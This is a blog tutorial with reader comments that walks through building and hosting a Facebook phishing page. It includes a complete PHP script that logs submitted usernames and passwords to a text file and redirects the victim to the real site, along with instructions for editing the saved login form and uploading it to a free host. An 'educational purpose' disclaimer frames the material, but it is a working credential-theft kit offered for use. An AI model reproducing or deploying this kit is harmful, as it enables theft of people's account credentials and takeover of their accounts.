How to make a phishing page?


 What is a Phishing Page?

The word "phishing is drived from the word " Fishing ". A phishing page is a duplicate or copy of any orignal webpage. for example Facebook phishing page would be a duplicate or ditto copy of facebook page and same for Google, Yahoo etc.


 What is the purpose behind making  Phishing Pages?

The purpose behind making a phishing page is to decieve people and to get thier details like usernames, passwords, credit card numbers, etc etc. It is as same as we to use to catch the fish by decieving it.


 Is making a Phishing Page Illegal?

Making a phishing page is not illegal but using it to decieve people, hacking accounts (e.g facebook, google and yahoo etc accounts) or using it in any illegal activity is prohibited.


 A Phishing Page consist of ?

1. HTML file (Phishing page)
2. PHP Script
3. Text File

Download Ready Made Script and Skip to Step 5.




 How to make a Phishing Page ( For Educational Purpose ONLY )


Disclaimer & Warning: As i already mentioned above that making phishing pages is not illegal but using it to hack someone's account or to exploit their privacy is illegal.Kidnly don't misuse it.

The purpose of this tutorial is to educate you because when you will get to know "How it is done" you can better defend yourself from hackers and phishers.




Visit that website ,whose phishing page you want to create.(e.g facebook.com ).


Press ( Ctrl + S ) to save this page , Or go to file and click save web page option.



Name it as index.htm and click save.



After Saving you will have files as follows.





 Right Click on index.htm file and open it with notepad.





Press ( Ctrl + F ) to open find box.


Type "action" in find field  and press enter.
 

Now have to look for the action having no  quotation marks around it. In short you have to find these . (action="https://www.facebook.com/login.php? login_attempt=1" method="post" ) . See Fig Below.





Now you have to replace "https://www.facebook.com/login.php?" with "login.php" and method="post" to method="get". You should have like this.

 action="login.php" method="get" . See the fig below.




Once you are done save it. You are done with HTML File or Phishing Page.






 Making Phishing Page PHP Script


Copy the php code below and paste, open Notepad and paste it there. Press (Ctrl + S) or got file and click save to save file.
 

 ____________________________________________________________

<?php
header("Location: http://www.facebook.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
____________________________________________________________



Type file name  login.php , set file type to all and click save .



So you will have following files as shown in fig.



Create a new folder, name it " public_html ", and put all the above files in to that folder.


Now this is an option whether to zip the public_html folder by using any compress software like WinRAR, 7zip etc or not. But zipping file will help us in uploading files on server quickly. But you can also upload them one by one.


After this optional step ,you will have files like this.

Your Phishing page is completed : Download and Match it with yours.


Click Here To Go to 000webhost.com . Create your account to Upload these files.

After Creating account when you will login, you will see a page like below. Click on Create new as highlighted in the fig.


Type in the name that you want as your domain.In my case i have type mrblogo, you may type any name like your own name ,friend's name. Type a password for your domain name. And click on "Setup New Account".


A Message like below will be displayed that you account has been created. Plz note down the user name and password because it will needed for login. Click on " Back To Account List "



   

Click on Control panel as highlighted in fig below to open control panel .




After control panel is opened, scroll down below and look for "File Manger" and click on it,. as highlighted in the fig below.  A new page will open. Login with the username and password that was noted in step 5.



After loging in a page like below will be opened. Check on public_html folder as highlighted in the fig below.


After that look for Delete button on the right hand side, as you can see in the fig below, and click on it.


A new page will be opened, on that page click on tick button, as highlighted in the fig below to proceed with deletion.


When files are deleted click on the back button , which is highlighted in the fig below.


Then click on the upload button, as highlighted in the fig below.



Click on Browse on Right hand side..


Select public_html folder


Click on Tick button to upload your files, as highlighted in the fig below. And you are done making a working phishing page.


Now It's a Testing Time..!

Copy the Domain name that you had created, and paste it in the browser and press enter. See the fig below.


You see, our page is working...!


Now I have entered a sample email "testmail@gmail.com" and password "123456"  and logged in.



Now again open public_html directory by clicking on it.

A file with a name passes.txt has been created.


Now you can click on it and download it. Or click on edit button on the right hand side to see details...


So here the email and password are. No N'joy.





Free Web Hosting Service!

Web Hosting

Post your Questions in comment section below in regard with this post.

6 comments:

  1. Yr Ye Kam ni Kr Raha Hai Q Sir Sub Kch Me Ready Krta Ho Lekin jab index.htm Pe Click Kro To Kch Aur Codings Show Krta Hai Plz Help yar

    ReplyDelete
    Replies
    1. Ap ne details zayada nahen batai, Jahan tak muje samajh aya hai us ke mutabiq Ap ne ager files server (000webhost) per upload ker de hain tou us ke bad ap ne Index.htm per click nahen kerna. ap ne jo domain name banai hai jesay k uper tutorial mein hai "mrblogo.comyr.com" us pe click kerna hai ya browser mein type ker k enter keren pher phishing page samny aye ga.

      Delete
  2. mera account nahi ban raha 000webhosting me.. error is " please enter your full domain or sub domain but both not "
    kya karu m? :(

    ReplyDelete
    Replies
    1. You need to enter only Sub domain.not full domain.

      Delete
  3. bro mera passes txt nai a raha

    ReplyDelete
    Replies
    1. Passes txt automatically banti hai . Jab Email Aur Password enter hoga phishing page se tou ye khud ba khud ban jaye ge. Ap Testing ke liye apna email aur password dal ke check ker lo.

      Delete

We highly Appreciate your time and efforts. Please use it for a healthy discussion. "Don't SPAM Please!"

If you want to make a Back link or promote your site, simply send a request @ www.facebook.com/Mr.Blogo

Regards,
Team Mr.Blogo